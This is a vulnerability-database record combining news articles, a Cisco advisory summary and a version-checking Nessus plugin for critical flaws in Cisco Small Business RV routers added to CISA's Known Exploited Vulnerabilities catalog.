DATABASE RESOURCES PRICING ABOUT US

{"id": "THN:BFD431BCD0AED94215283E172C006DEB", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "CISA Adds Another 95 Flaws to its Actively Exploited Vulnerabilities Catalog", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgviIZ-E4Oo1c7m_LaoMT0M2aBwOn-VY_1ZEXk9kLI9nT6ht2O7vnSfkVvFcc1qNXgzFR_7M1zgtUlZBZ9Sw-M2QJ2vND82mU_EnNJ4wQCzcPWIBj42FZ4KwUgU5iMmR5Yzleqe-RKISoBUXEMlPA0EAl9t0sp1raZgTnzCQCvwZ2FZqFJIjE4XNqki>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week added 95 more security flaws to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), taking the total number of actively exploited vulnerabilities to 478.\n\n\"These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise,\" the agency [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/03/03/cisa-adds-95-known-exploited-vulnerabilities-catalog>) in an advisory published on March 3, 2022.\n\nOf the 95 newly added bugs, 38 relate to Cisco vulnerabilities, 27 for Microsoft, 16 for Adobe, seven impact Oracle, and one each corresponding to Apache Tomcat, ChakraCore, Exim, Mozilla Firefox, Linux Kernel, Siemens SIMATIC CP, and Treck TCP/IP stack.\n\nIncluded in the list are five issues discovered in Cisco RV routers, which CISA notes are being exploited in real-world attacks. The flaws, which [came to light](<https://thehackernews.com/2022/02/critical-flaws-discovered-in-cisco.html>) early last month, allow for the execution of arbitrary code with root privileges.\n\nThree of the vulnerabilities \u2013 CVE-2022-20699, CVE-2022-20700, and CVE-2022-20708 \u2013 are rated 10 out 10 on the CVSS rating scale, enabling an attacker to inject malicious commands, elevate privileges to root, and run arbitrary code on vulnerable systems.\n\nCVE-2022-20701 (CVSS score: 9.0) and CVE-2022-20703 (CVSS score: 9.3) are no different in that they could allow an adversary to \"execute arbitrary code elevate privileges, execute arbitrary commands, bypass authentication and authorization protections, fetch and run unsigned software, or cause a denial of service,\" CISA added.\n\nCisco, for its part, previously acknowledged that it's \"aware that proof-of-concept exploit code is available for several of the vulnerabilities.\" Additional nature of the attacks or the threat actors that may be weaponizing them is unknown as yet.\n\nTo reduce the significant risk of the vulnerabilities and prevent them from being used as a vector for potential cyber-attacks, federal agencies in the U.S. are mandated to apply the patches by March 17, 2022.\n\nThe development comes shortly after Cisco released patches for [critical security vulnerabilities](<https://thehackernews.com/2022/03/critical-patches-issued-for-cisco.html>) affecting Expressway Series and Cisco TelePresence Video Communication Server (VCS) earlier in the week that could be exploited by a malicious party to gain elevated privileges and execute arbitrary code.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2022-03-05T07:32:00", "modified": "2022-03-07T03:28:08", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2022/03/cisa-adds-another-95-flaws-to-its.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2022-20699", "CVE-2022-20700", "CVE-2022-20701", "CVE-2022-20703", "CVE-2022-20708"], "immutableFields": [], "lastseen": "2022-05-09T12:37:29", "viewCount": 19, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:A4434B3A-9194-4BD6-A1B1-77463B7E3875", "AKB:C141ACE4-A8F1-4772-B648-6B3AA5B46B43", "AKB:CBF7C2C4-17B9-46E9-ADE8-64190C6E9F7D", "AKB:CE938B08-8EB0-4D1D-AA82-632EA9010ECF", "AKB:EF34D3A0-4FF6-4B40-9AAB-8759959DE40F"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2022-0108"]}, {"type": "cisco", "idList": ["CISCO-SA-SMB-MULT-VULN-KA9PK6D"]}, {"type": "cve", "idList": ["CVE-2022-20699", "CVE-2022-20700", "CVE-2022-20701", "CVE-2022-20703", "CVE-2022-20708"]}, {"type": "githubexploit", "idList": ["26AFA65D-4E78-506D-A1E9-336FBDA926A1", "2B4DA5E1-C2B9-5F0A-AFF5-D1C6D45FA38C", "A97B12FD-207B-59C7-9E79-80106F63D735"]}, {"type": "nessus", "idList": ["CISCO-SA-SMB-MULT-VULN-KA9PK6D.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:167113"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:1C4EBCEAFC7E54954F827CAEDB3291DA"]}, {"type": "thn", "idList": ["THN:DFFEC77385F3B4F85C43CE529B98C152"]}, {"type": "threatpost", "idList": ["THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6"]}, {"type": "zdi", "idList": ["ZDI-22-408", "ZDI-22-412", "ZDI-22-413", "ZDI-22-414", "ZDI-22-417"]}, {"type": "zdt", "idList": ["1337DAY-ID-37729"]}]}, "score": {"value": 1.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:A4434B3A-9194-4BD6-A1B1-77463B7E3875", "AKB:C141ACE4-A8F1-4772-B648-6B3AA5B46B43", "AKB:CBF7C2C4-17B9-46E9-ADE8-64190C6E9F7D", "AKB:CE938B08-8EB0-4D1D-AA82-632EA9010ECF", "AKB:EF34D3A0-4FF6-4B40-9AAB-8759959DE40F"]}, {"type": "githubexploit", "idList": ["2B4DA5E1-C2B9-5F0A-AFF5-D1C6D45FA38C"]}, {"type": "nessus", "idList": ["CISCO-SA-SMB-MULT-VULN-KA9PK6D.NASL"]}]}, "epss": [{"cve": "CVE-2022-20699", "epss": "0.945170000", "percentile": "0.987100000", "modified": "2023-03-18"}, {"cve": "CVE-2022-20700", "epss": "0.004420000", "percentile": "0.708850000", "modified": "2023-03-18"}, {"cve": "CVE-2022-20701", "epss": "0.000730000", "percentile": "0.296870000", "modified": "2023-03-18"}, {"cve": "CVE-2022-20703", "epss": "0.000920000", "percentile": "0.378170000", "modified": "2023-03-18"}, {"cve": "CVE-2022-20708", "epss": "0.005090000", "percentile": "0.729360000", "modified": "2023-03-18"}], "vulnersScore": 1.9}, "_state": {"dependencies": 1659988328, "score": 1659965167, "epss": 1679179052}, "_internal": {"score_hash": "7be441a56566fa8b96e8a93b1520449d"}}

{"nessus": [{"lastseen": "2023-02-17T14:52:39", "description": "According to its self-reported version, Cisco Small Business RV Series Router Firmware is affected by multiple vulnerabilities:\n\n - A vulnerability in the SSL VPN module of Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. (CVE-2022-20699)\n\n - Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV Series Routers could allow a remote attacker to elevate privileges to root. (CVE-2022-20700, CVE-2022-20701, CVE-2022-20702)\n\n - A vulnerability in the software image verification feature of Cisco Small Business RV Series Routers could allow an unauthenticated, local attacker to install and boot a malicious software image or execute unsigned binaries on an affected device. (CVE-2022-20703)\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T00:00:00", "type": "nessus", "title": "Cisco Small Business RV Series Routers Multiple Vulnerabilities (cisco-sa-smb-mult-vuln-KA9PK6D)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699", "CVE-2022-20700", "CVE-2022-20701", "CVE-2022-20702", "CVE-2022-20703", "CVE-2022-20704", "CVE-2022-20705", "CVE-2022-20706", "CVE-2022-20707", "CVE-2022-20708", "CVE-2022-20709", "CVE-2022-20710", "CVE-2022-20711", "CVE-2022-20712", "CVE-2022-20749"], "modified": "2022-12-05T00:00:00", "cpe": ["x-cpe:/o:cisco:small_business_rv_series_router_firmware", "cpe:/h:cisco:rv340", "cpe:/h:cisco:rv340w", "cpe:/h:cisco:rv345", "cpe:/h:cisco:rv345p", "cpe:/h:cisco:rv160", "cpe:/h:cisco:rv160w", "cpe:/h:cisco:rv260", "cpe:/h:cisco:rv260p", "cpe:/h:cisco:rv260w"], "id": "CISCO-SA-SMB-MULT-VULN-KA9PK6D.NASL", "href": "https://www.tenable.com/plugins/nessus/157361", "sourceData": "#TRUSTED 87f0de8908e6f71b057708361c8b0aeed5481155ca2dd8263930804cfccdb5be454398f507f58842087413cc1234e0580d17b7386234bf4e09216c31fca84be34bf445243a18cbdea092df8b87fb67bf812b66c86595a5c04767edca99bc2dc541afdb6a410a1a884c2e0ee2b9b58d43d1c316c018ea526ee5fc8d84e5f8fbdaa0f0af37e39c853d7e2b0089c9449f66bfe20f5a7544f1e58c3514e91bde8450be13e62e817b8a736c2a4d3e317395f9d8d247a247a0cfd6721dbfa0e291edf3ffd0e7d4e894471b5e18231275478316df119c2c7e99c0dcda58d91fa90c3ee304b06b6b135746a7495c6ade9f454ac9265c625748be4c78137949442e998408590d2244ee7996745c42bb296d351e8e5ff7b03338ee66583becfada2bca22a9501f1d245fe8a147f14a1c2de514808f1d50b9c06a96109b490f1a497944a0ab1eb2e0b8917fe26a9caf6d6e995f4380683a6e75ac0beb355206ed0ca965110c4ab3e56f5f69d2af78460153b1d0541c2e560915802827380d907df533c07c085d7daeea31a3c722b8cf7bae21f9a7e14aa87b054c3be613b496fca3cba128279b9f41cbc97e69f901ffdd6647b66401fc4f796bdab13eb860b98797045bba23bf4d3b5a20e3a1eba4eab5b87b100060a686878509dc29b4958214b4ebf358c5f1154bef9f695c20279db8e23be92ef492fbcb95219369a20f45a998cbd1fd18\n#TRUST-RSA-SHA256 9a61be5325880234642b8345c728c30ba0dba8c1d571cc6005a44c6c914e1f93d9d11c3619791148315ead0d40047e685c8b13d1df87eec62d9a67dd5fccba58ef000a3fadf1b4a667370b09b918f4925bb4b0abeca732404a21903d64cafc8d34afa7593c44e808e3e66f2c43cd5300595ca2f2e55d170c69d5a6eb4bc996eb20f24f973a3520ca37fbd97479918f913de73bd9a2139b2623d087e4f7ebb71c5c61b1fd1097b8cc53ff0fbf7ffb6526fea3f1fa3d13d0976412eb615c6fd8626bc8c2886a3736dca7a5408712233bd55afd255f81ae20a2c0885cd9ce56a714af189a71f3da773a3edf5b16846a46d14aba20d33f18caee931415752725a8b7210a6c06ec87b4e387d4f5eb7ea122812f9d290f279d26414654751ef66d9898d428c5c336bfb02be5e961e79bd253fb0e924021c5572ef9163328a5704819d77dca297e2a714d4d78faf2dfd6574b566092c01a2928f1d236a1c805cfaeff04255c7fb88563c7941af682ce56d208136e0cdfc67eb5b5c3007d9ed90ed28e39dfc1a463ba7f4ad7b5400ceac2c116d62246adf0252421b60fd7d734ebbf674326515cc5a269ccee62b297ca7aa36cb8c85c9d7c5fbdabea7206eb51c754e0550f11e34b996f0bb1ee44909a0a662654fd94b71918fc7115df8710e5d539e4ccc362a0cde12cb8f7ffbc4e2f7189e04bc259a5248afe204b0f261c5ea770fc9f\n#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157361);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2022-20699\",\n \"CVE-2022-20700\",\n \"CVE-2022-20701\",\n \"CVE-2022-20702\",\n \"CVE-2022-20703\",\n \"CVE-2022-20704\",\n \"CVE-2022-20705\",\n \"CVE-2022-20706\",\n \"CVE-2022-20707\",\n \"CVE-2022-20708\",\n \"CVE-2022-20709\",\n \"CVE-2022-20710\",\n \"CVE-2022-20711\",\n \"CVE-2022-20712\",\n \"CVE-2022-20749\"\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvz88279\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvz94704\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa12732\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa12748\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa12836\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13115\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13119\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13205\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13682\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13836\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13882\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13888\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa13900\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa14007\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa14008\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa14564\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa14565\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa14601\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa14602\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa15167\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa15168\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa18769\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa18770\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa32432\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa36774\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa54598\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-smb-mult-vuln-KA9PK6D\");\n script_xref(name:\"IAVA\", value:\"2022-A-0058\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0004\");\n\n script_name(english:\"Cisco Small Business RV Series Routers Multiple Vulnerabilities (cisco-sa-smb-mult-vuln-KA9PK6D)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, Cisco Small Business RV Series Router Firmware is affected by multiple\nvulnerabilities:\n\n - A vulnerability in the SSL VPN module of Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN\n Gigabit VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code on an affected\n device. (CVE-2022-20699)\n\n - Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV Series Routers could\n allow a remote attacker to elevate privileges to root. (CVE-2022-20700, CVE-2022-20701, CVE-2022-20702)\n\n - A vulnerability in the software image verification feature of Cisco Small Business RV Series Routers could allow\n an unauthenticated, local attacker to install and boot a malicious software image or execute unsigned binaries\n on an affected device. (CVE-2022-20703)\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d880707f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvz88279\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvz94704\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa12732\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa12748\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa12836\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13115\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13119\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13205\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13682\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13836\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13882\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13888\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa13900\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa14007\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa14008\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa14564\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa14565\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa14601\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa14602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa15167\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa15168\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa18769\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa18770\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa32432\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa36774\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa54598\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug IDs CSCvz88279, CSCvz94704, CSCwa12732, CSCwa12748,\nCSCwa12836, CSCwa13115, CSCwa13119, CSCwa13205, CSCwa13682, CSCwa13836, CSCwa13882, CSCwa13888, CSCwa13900, CSCwa14007,\nCSCwa14008, CSCwa14564, CSCwa14565, CSCwa14601, CSCwa14602, CSCwa15167, CSCwa15168, CSCwa18769, CSCwa18770, CSCwa32432,\nCSCwa36774, CSCwa54598\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-20749\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Cisco RV340 SSL VPN Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(77, 121, 269, 285, 295, 347, 362, 434, 552, 754, 785);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:cisco:small_business_rv_series_router_firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv340\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv340w\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv345\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv345p\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv160\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv160w\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv260\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv260p\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv260w\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_small_business_detect.nasl\", \"cisco_rv_webui_detect.nbin\");\n script_require_keys(\"Cisco/Small_Business_Router/Version\", \"Cisco/Small_Business_Router/Model\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Small Business Series Router Firmware');\n\nvar vuln_ranges;\nif (product_info['model'] =~ \"^RV(1|2)60\")\n vuln_ranges = [{ 'min_ver' : '0', 'fix_ver' : '1.0.01.07' }];\nelse if (product_info['model'] =~ \"^RV34(0|5)\")\n vuln_ranges = [{ 'min_ver' : '1.0.03.24', 'fix_ver' : '1.0.03.26' }];\nelse\n audit(AUDIT_HOST_NOT, 'an affected Cisco Small Business RV Series router');\n\nvar reporting = make_array(\n 'port' , product_info['port'],\n 'severity' , SECURITY_HOLE,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvz88279, CSCvz94704, CSCwa12732, CSCwa12748, CSCwa12836, CSCwa13115, CSCwa13119, CSCwa13205, CSCwa13682, CSCwa13836, CSCwa13882, CSCwa13888, CSCwa13900, CSCwa14007, CSCwa14008, CSCwa14564, CSCwa14565, CSCwa14601, CSCwa14602, CSCwa15167, CSCwa15168, CSCwa18769, CSCwa18770, CSCwa32432, CSCwa36774, CSCwa54598',\n 'disable_caveat', TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n vuln_ranges:vuln_ranges\n);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2022-12-17T06:19:29", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following:\n\nExecute arbitrary code\nElevate privileges\nExecute arbitrary commands\nBypass authentication and authorization protections\nFetch and run unsigned software\nCause denial of service (DoS)\n\nFor more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.\n\nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D\"]", "cvss3": {}, "published": "2022-02-02T16:00:00", "type": "cisco", "title": "Cisco Small Business RV Series Routers Vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-20699", "CVE-2022-20700", "CVE-2022-20701", "CVE-2022-20702", "CVE-2022-20703", "CVE-2022-20704", "CVE-2022-20705", "CVE-2022-20706", "CVE-2022-20707", "CVE-2022-20708", "CVE-2022-20709", "CVE-2022-20710", "CVE-2022-20711", "CVE-2022-20712", "CVE-2022-20749"], "modified": "2022-02-14T13:54:42", "id": "CISCO-SA-SMB-MULT-VULN-KA9PK6D", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D", "cvss": {"score": 10.0, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}}], "thn": [{"lastseen": "2022-05-09T12:37:36", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEggUIor3NC8qvtjyt9YASYnMWPLxsl-P_PHtEouUnnH9RiFuzkhlnkJ1dpl4e67-BdzivejJXKOU9MGxP3Y3qdZ0xdVXtF2yBDx8DrmNFYvRmf5Sx-sIz8z7otN4A3_fuvztKwazYqYZQxxw4w59trQU7FOJFIoszwPGltAhPzBbadPhcQJAsv3ia9V>)\n\nCisco has patched multiple critical [security vulnerabilities](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D>) impacting its RV Series routers that could be weaponized to elevate privileges and execute arbitrary code on affected systems, while also warning of the existence of proof-of-concept (PoC) exploit code targeting some of these bugs.\n\nThree of the 15 flaws, tracked as CVE-2022-20699, CVE-2022-20700, and CVE-2022-20707, carry the highest CVSS rating of 10.0, and affect its Small Business RV160, RV260, RV340, and RV345 Series routers.\n\nAdditionally, the flaws could be exploited to bypass authentication and authorization protections, retrieve and run unsigned software, and even cause denial-of-service (DoS) conditions.\n\nThe networking equipment maker acknowledged that it's \"aware that proof-of-concept exploit code is available for several of the vulnerabilities\" but didn't share any further specifics on the nature of the exploit or the identity of the threat actors that may be exploiting them.\n\nCVE-2022-20699 concerns a case of remote code execution that could be exploited by an attacker by sending specially crafted HTTP requests to a device that functions as an SSL VPN Gateway, effectively leading to the execution of malicious code with root privileges.\n\nCVE-2022-20700, CVE-2022-20701 (CVSS score: 9.0), and CVE-2022-20702 (CVSS score: 6.0), which the company said stems from an insufficient authorization enforcement mechanism, could be abused to elevate privileges to root and execute arbitrary commands on the affected system.\n\nCVE-2022-20708, the third flaw to receive a 10.0 score on the CVSS scale, is due to insufficient validation of user-supplied input, enabling the adversary to inject malicious commands and get them on the underlying Linux operating system.\n\nOther flaws fixed by Cisco are as follows:\n\n * **CVE-2022-20703** (CVSS score: 9.3) \u2013 Cisco Small Business RV Series Routers Digital Signature Verification Bypass Vulnerability\n * **CVE-2022-20704** (CVSS score: 4.8) \u2013 Cisco Small Business RV Series Routers SSL Certificate Validation Vulnerability\n * **CVE-2022-20705** (CVSS score: 5.3) \u2013 Cisco Small Business RV Series Routers Improper Session Management Vulnerability\n * **CVE-2022-20706** (CVSS score: 8.3) \u2013 Cisco RV Series Routers Open Plug and Play Command Injection Vulnerability\n * **CVE-2022-20707 and CVE-2022-20749** (CVSS scores: 7.3) \u2013 Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Command Injection Vulnerabilities\n * **CVE-2022-20709** (CVSS score: 5.3) \u2013 Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Arbitrary File Upload Vulnerability\n * **CVE-2022-20710** (CVSS score: 5.3) \u2013 Cisco Small Business RV Series Routers GUI Denial of Service Vulnerability\n * **CVE-2022-20711** (CVSS score: 8.2) \u2013 Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Arbitrary File Overwrite Vulnerability\n * **CVE-2022-20712** (CVSS score: 7.3) \u2013 Cisco Small Business RV Series Routers Upload Module Remote Code Execution Vulnerability\n\nCisco also stressed that there are no workarounds that address these aforementioned weaknesses, urging customers to update to the latest version of the software as soon as possible to counter any potential attacks.\n\n \n\n\nFound this article interesting? Follow THN on 